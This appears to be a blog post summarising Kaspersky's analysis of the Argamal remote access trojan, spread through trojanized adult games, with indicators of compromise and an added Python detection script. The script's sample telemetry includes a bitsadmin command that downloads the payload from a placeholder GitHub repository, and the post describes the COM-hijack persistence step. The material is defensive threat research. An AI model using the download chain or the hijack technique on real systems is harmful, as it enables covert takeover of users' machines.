
Argamal RAT, Delivered via Hentai Games, Infects Hundreds of People in Russia, Brazil, Germany and Vietnam

securelist.com · @threat_watch · 3 hours ago · Cybersecurity · 1 comment

Kaspersky identified Argamal, a RAT hidden in hentai games since 2024, which uses COM hijacking and encrypted payloads to compromise hundreds of victims in four countries.

Tags: argamal, kaspersky, hentai games, remote access trojan, com hijacking, trojanized games

Hundreds of users—mostly in Russia, Brazil, Germany, and Vietnam—had their machines fully taken over by a new RAT named Argamal, delivered through trojanized hentai games discovered since April 2026. Kaspersky's analysis of the campaign, which appears to have been active since at least 2024, reveals a surprisingly sophisticated infection chain that combines game engine exploitation with multi-stage PowerShell and COM hijacking.

Delivery via Infected FFmpeg DLLs and PowerShell Chains

Attackers distributed the trojanized games through dedicated websites and torrent trackers like AniRena, with downloads hosted on PixelDrain. The archives contained fully functional adult games—built with engines like RenPy (Python) and RPG Maker MV (JavaScript)—alongside a modified FFmpeg DLL. That DLL imports DllGetClassObject from a file called natives2_blob.bin, which is actually a DLL that executes a Base64-encoded PowerShell script (Stage1) when the game loads.

Stage1 checks for sandbox environments (Sandboxie folder, Procmon64 process) before setting persistence. It creates a scheduled task that fires three days later, running a second PowerShell script (Stage2). Stage2 uses bitsadmin.exe to download an encrypted payload (zaesdl.dat) from GitHub repositories (hxxps://github[.]com/gmz159/u, hxxps://github[.]com/DnyP/files, etc.) and decrypts it using AES-CBC with the key zbcd1j9234r670eh. The decrypted payload is saved as a DLL and registered for COM hijacking.

COM Hijacking and Persistence via Windows Color System

The malware replaces the InprocServer32 entry for the Windows Color System Calibration Loader DLL (CLSID {B210D694-C8DF-490D-9576-9E20CDBC20BD}). The Calibration Loader is started by a built-in scheduled task at every user login, so the RAT loads automatically each session. Stage2 then cleans up its own artifacts—it removes the temporary registry keys under {722D0F89-B69C-4700-AE8C-4A44350E4876}, unsets the environment variables MI_V and MI_V2, and deletes the one-time scheduled task.
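As an added defensive example (not code from the Securelist report or from this post), the following Python scans constructed Sysmon-style events for two stages of the chain described above: the bitsadmin.exe download from GitHub and the rewritten InprocServer32 for the Calibration Loader CLSID. Event field names follow Sysmon; the repository path, SID, user and DLL names in the sample are placeholders.

```python
import re
# Added detection example (not Securelist's code). CLSID and payload name come from the write-up;
# event shapes follow Sysmon (EventID 1 = process create, 13 = registry value set).
CALIBRATION_LOADER_CLSID = "{B210D694-C8DF-490D-9576-9E20CDBC20BD}".lower()
PAYLOAD_NAME = "zaesdl.dat"
GITHUB_URL_RE = re.compile(r"https?://(?:raw\.)?github(?:usercontent)?\.com/", re.I)

def check_registry_set(ev):
    """Flag a rewritten InprocServer32 for the Calibration Loader: a per-user (HKU) override
    of this system CLSID, or a server DLL outside %SystemRoot%\\System32."""
    target = ev.get("TargetObject", "").lower()
    if ev.get("EventID") != 13 or CALIBRATION_LOADER_CLSID not in target or "inprocserver32" not in target:
        return None
    value = ev.get("Details", "").strip('"').lower()
    if target.startswith("hku\\") or "\\windows\\system32\\" not in value:
        return f"COM hijack: Calibration Loader InprocServer32 -> {value}"
    return None

def check_process(ev):
    """Flag bitsadmin.exe fetching from GitHub, or the encrypted payload name on any command line."""
    if ev.get("EventID") != 1:
        return None
    image, cmd = ev.get("Image", "").lower(), ev.get("CommandLine", "")
    if image.endswith("\\bitsadmin.exe") and GITHUB_URL_RE.search(cmd):
        return f"bitsadmin download from GitHub: {cmd}"
    if PAYLOAD_NAME in cmd.lower():
        return f"payload name on command line: {cmd}"
    return None

def scan(events):
    """Group findings per host so the download and the COM hijack show up together."""
    findings = {}
    for ev in events:
        hit = check_registry_set(ev) or check_process(ev)
        if hit:
            findings.setdefault(ev.get("Computer", "?"), []).append(hit)
    return findings

# Constructed sample telemetry: repo path, SID, user name and DLL names are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "ws01", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer j /download https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/raw/main/zaesdl.dat C:\Users\u\AppData\Local\Temp\zaesdl.dat"},
    {"EventID": 13, "Computer": "ws01",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}\InprocServer32\(Default)",
     "Details": r"C:\Users\u\AppData\Roaming\Microsoft\loader.dll"},
    {"EventID": 13, "Computer": "ws02",  # machine hive, DLL in System32: not flagged
     "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}\InprocServer32\(Default)",
     "Details": r"C:\Windows\System32\placeholder.dll"},
    {"EventID": 1, "Computer": "ws02", "Image": r"C:\Windows\System32\bitsadmin.exe", "CommandLine": "bitsadmin /list"},
]
```

Running `scan(SAMPLE_EVENTS)` reports only ws01, with the GitHub download and the per-user InprocServer32 override listed together.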

Full RAT Capabilities Under the Hood

The final payload is a RAT with broad functionality. Earlier versions used a rolling XOR key (0xB0C1D4E9); newer versions employ a substitution cipher with keys like 17htUno/I3L&fK2H#yapE@b5NqZ$Q4xmeF.s96uB>jkdWCPvAgD*XwO:iR~TMrV0YGl8z. The RAT checks for 40+ security tools via tasklist, then sends UDP heartbeats to the C2 (asper1[.]freeddns[.]org early on, Winst0[.]kozow[.]com later; both resolve to 186[.]158[.]223[.]35 on AS11664). Interestingly, if the user's locale is zh-CN, the malware sets its C2 to country1[.]ignorelist[.]com, which until recently pointed to 127.0.0.1. Deliberately avoiding Chinese users suggests the payload may have been developed by a Chinese-speaking actor, though the comments in the delivery chain are in Spanish.

C2 can switch the RAT to extended TCP mode on port 3747, where commands are encrypted with a fixed substitution cipher. The command set includes file operations (ZIP, TAR, delete), surveillance (screenshots, keystroke injection), system control (reboot, shutdown, execute commands), and reconnaissance (user, OS, drives, Chrome data paths). In short, the attackers can do anything.

I've seen steady updates to Argamal since 2024—new encryption, bug fixes, infrastructure changes. The threat actor behind this campaign isn't going anywhere. Expect more trojanized game variants and smarter evasion techniques aimed at anyone who downloads adult games from untrusted sources.


Source: Argamal: Malware hidden in hentai games
Domain: securelist.com
